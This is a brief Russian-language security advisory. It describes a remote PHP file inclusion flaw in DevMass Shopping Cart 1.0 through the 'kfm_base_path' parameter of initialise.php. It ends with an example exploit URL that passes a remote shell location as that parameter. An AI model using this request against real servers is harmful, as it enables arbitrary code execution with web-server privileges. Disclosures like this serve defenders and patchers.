Программа: DevMass Shopping Cart 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «kfm_base_path» сценарием initialise.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.
Пример:
[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell]